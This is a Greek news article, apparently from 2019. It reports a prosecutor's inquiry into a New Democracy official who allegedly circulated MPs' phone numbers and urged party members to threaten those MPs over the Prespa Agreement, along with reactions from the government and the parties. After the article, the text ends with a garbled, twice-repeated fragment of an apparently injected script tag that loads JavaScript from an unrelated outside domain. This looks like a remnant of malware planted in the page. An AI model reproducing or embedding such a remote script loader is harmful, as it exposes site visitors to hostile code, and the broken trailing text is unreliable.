Εισαγγελέας για το νεοδημοκρατικό «κάρφωμα» βουλευτών 

Την παρέμβαση της εισαγγελέως του Αρείου Πάγου προκάλεσε δημοσίευμα του documentonews.gr, σύμφωνα με το οποίο στέλεχος της Ν.Δ. παρακινεί μέσω μηνυμάτων φίλους και μέλη του κόμματος να στέλνουν μηνύματα ή να παίρνουν τηλέφωνο και να απειλούν βουλευτές για να μη στηρίξουν τη Συμφωνία των Πρεσπών.

Ειδικότερα, η εισαγγελέας του Αρείου Πάγου, Ξένη Δημητρίου, παρήγγειλε στον προϊστάμενο της Εισαγγελίας Πρωτοδικών τη διενέργεια ποινικής προκαταρκτικής έρευνας προκειμένου να διακριβωθεί εάν έχουν τελεστεί τα αδικήματα της παραβίασης προσωπικών δεδομένων και της παρακίνησης σε τέλεση κακουργήματων.

Σύμφωνα με το δημοσίευμα, ο Σπ. Αβραμάκος, πρόεδρος της μεγαλύτερης Νομαρχιακής Οργάνωσης της Ν.Δ., Β4 ΝΟΔΕ, στέλνει σε φίλους και μέλη της Ν.Δ. εντολή να στέλνουν μηνύματα ή να παίρνουν τηλέφωνο τους βουλευτές Κατερίνα Παπακώστα (υφυπουργό Προστασίας του Πολίτη), Βασίλη Κόκκαλη (ΑΝ.ΕΛΛ.), Έλενα Κουντουρά (υπουργός Τουρισμού), Θανάση Παπαχριστόπουλο (ΑΝ.ΕΛΛ.), Μάρκο Μπόλαρη (υφυπουργός Εξωτερικών), Κώστα Ζουράρι (ΑΝ.ΕΛΛ.) και Ιωάννη Σαρίδη (Ένωση Κεντρώων) και ζητά από τους παραλήπτες του μηνύματος να απειλούν τους βουλευτές να μην τολμήσουν να στηρίξουν τη Συμφωνία των Πρεσπών, ενώ τους αποκαλεί «προδότες».

Το δημοσίευμα επιβεβαίωσε ο ίδιος ο κ. Αβραμάκος με ανάρτησή του στο facebook, στην οποία σημειώνει ότι: «Μου προκαλεί πραγματική έκπληξη ότι ο πρωθυπουργός της χώρας μας και το επιτελείο του, ενώ καταρρέει η κυβέρνηση και ουδείς μπορεί να παρακολουθήσει πια τις κωλοτούμπες του εταίρου του, βρίσκουν το χρόνο να ασχοληθούν με ένα μήνυμα ενός προέδρου από τις 66 ΝΟΔΕ της Ν.Δ.!»

Στη συνέχεια φτάνει στο σημείο να χαρακτηρίζει την ενέργειά του συνηθισμένη πρακτική(!) αναφέροντας χαρακτηριστικά: «Τους ενημερώνω ότι η πρακτική να αποστέλλονται mails και να γίνονται τηλέφωνα από ψηφοφόρους σε πολιτικούς είναι σύνηθες σε όλο τον πολιτισμένο δημοκρατικό κόσμο. Και περιττεύει ασφαλώς να αναφέρω, ότι η πίεση του τάχα επίμαχου μηνύματος είναι πολιτική. Εμείς πιέζουμε να μην ψηφιστεί η συμφωνία των Πρεσπών με επώνυμα μηνύματα.!! Άλλοι είναι αυτοί που πολιτεύτηκαν και πολιτεύονται με βία και μολότωφ!!»

Λίγο νωρίτερα το δημοσίευμα είχε επιβεβαιώσει και ο βουλευτής των ΑΝ.ΕΛΛ. Θ. Παπαχριστόπουλος τονίζοντας (news 24/7) ότι «κάθε δέκα λεπτά χτυπάει τηλέφωνο. Μου λένε “είσαι προδότης, θα δικαστείς για εσχάτη προδοσία, το κεφάλι σου σε χαντάκι θα βρεθεί” και διάφορα άλλα. Δεν μπορώ να δουλέψω, έχω διαγράψει 200 μηνύματα. Εγώ δεν φοβάμαι, δεν πήρα ποτέ αστυνομικούς και δεν θα πάρω. Κάποιοι άλλοι όμως έχουν οικογένειες και παιδιά. Κάποιος το έχει δουλέψει όλο αυτό. Ακόμα και από το εξωτερικό με παίρνουν».

Για την αποκάλυψη, που συνοδεύεται από  σχετική εικόνα με το ηλεκτρονικό μήνυμα, τοποθετήθηκε ο αναπληρωτής εκπρόσωπος Τύπου της Ν.Δ., Κ. Κυρανάκης, οι δηλώσεις του οποίου προκαλούν αίσθηση.

«Το να παίρνει τηλέφωνο ο ψηφοφόρος σε πολιτικά γραφεία δεν είναι εκφοβισμός. Δεν είναι απλά δικαίωμα, είναι υποχρέωση», τόνισε (news 24/7) o κ. Κυρανάκης, ο οποίος αν και διευκρίνισε ότι δεν έχει υπ’ όψιν του το συγκεκριμένο μήνυμα, συνέχισε παρέχοντας πολιτική κάλυψη στον Σπ. Αβραμάκο: «Επί της αρχής το να ζητά ένας ψηφοφόρος από τον εκλεγμένο εκπρόσωπό του να μην ψηφίσει κάτι είναι συνταγματική του υποχρέωση».

documentonews.gr

Μαξίμου: Επιχείρηση τρομοκράτησης βουλευτών με καθοδήγηση Μητσοτάκη

«Ο μηχανισμός της Ν.Δ., προφανώς με πλήρη γνώση και καθοδήγηση του κ. Μητσοτάκη, επιχειρεί να τρομοκρατήσει τους βουλευτές», επισημαίνει σε ανακοίνωσή του το γραφείο Τύπου του πρωθυπουργού και κάνει λόγο για «κυνική ομολογία» από τον κ. Κυρανάκη.

«Η αποκάλυψη των μαζικών μηνυμάτων με αποστολέα τον γραμματέα Β4 ΝΟΔΕ της Ν.Δ. κ. Αβραμάκο, προς οπαδούς του κόμματος, με τους αριθμούς των προσωπικών κινητών τηλεφώνων βουλευτών, παρακινώντας σε άσκηση βίας και τρομοκρατίας εναντίον τους, σε σχέση με τη θέση και ψήφο τους στο Κοινοβούλιο στο κρίσιμο εθνικό θέμα της Συμφωνίας των Πρεσπών, δεν αποτελεί μόνο παράνομη πράξη αλλά και ένα ακόμη βήμα στον αντιδημοκρατικό κατήφορο που έχει επιλέξει η Ν.Δ.», συνεχίζει η ανακοίνωση.

«Οι βουλευτές θα απαντήσουν υψώνοντας τη φωνή της συνείδησής τους για την προάσπιση του εθνικά ωφέλιμου», διαμηνύει το Μέγαρο Μαξίμου και σημειώνει: «Καμία απόπειρα βίας και τρομοκρατίας -από αυτές που είναι συνηθισμένοι άλλωστε ορισμένοι μηχανισμοί – δεν πρόκειται να κάμψει τη συνείδηση και το φρόνιμά τους. Η Ν.Δ. και ο κ. Μητσοτάκης όμως οφείλουν να λογοδοτήσουν στον ελληνικό λαό για την αντιδημοκρατική πρακτική που επιλέγουν.

»Άλλωστε είναι σε όλους φανερό ότι οι προσπάθειές τους καθόλου δεν έχουν να κάνουν με τις απόψεις τους για τη Συμφωνία των Πρεσπών, αλλά με την αγωνία τους να αποσταθεροποιήσουν τη κυβέρνηση, αδιαφορώντας για την αποσταθεροποίηση της ίδιας της χώρας και της πολιτικής ομαλότητας. Για άλλη μια φορά θα διαψευστούν».

ΣΥΡΙΖΑ: Η Ν.Δ. να διαγράψει τους εμπλεκόμενους

Το κόμμα της Κουμουνδούρου καταγγέλλει πως «την ώρα που ο κ. Μητσοτάκης μιλά για τις “ευρωπαϊκές αξίες” της Ν.Δ., στελέχη του κόμματός του, σύμφωνα με δημοσιεύματα, μεταφράζουν τις αξίες αυτές σε απειλητικά μηνύματα εναντίον βουλευτών για τη Συμφωνία των Πρεσπών!».

Ο ΣΥΡΙΖΑ καταλήγει πως περιμένει «οι αρμόδιες αρχές να ερευνήσουν την υπόθεση» και αναμένει από την ηγεσία της Ν.Δ. «να καταδικάσει έμπρακτα και να διαγράψει όσους σχετίζονται με αυτήν την άθλια επιχείρηση εκφοβισμού, ώστε να δείξει ότι δεν έχει σχέση και η ίδια με αυτήν».

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>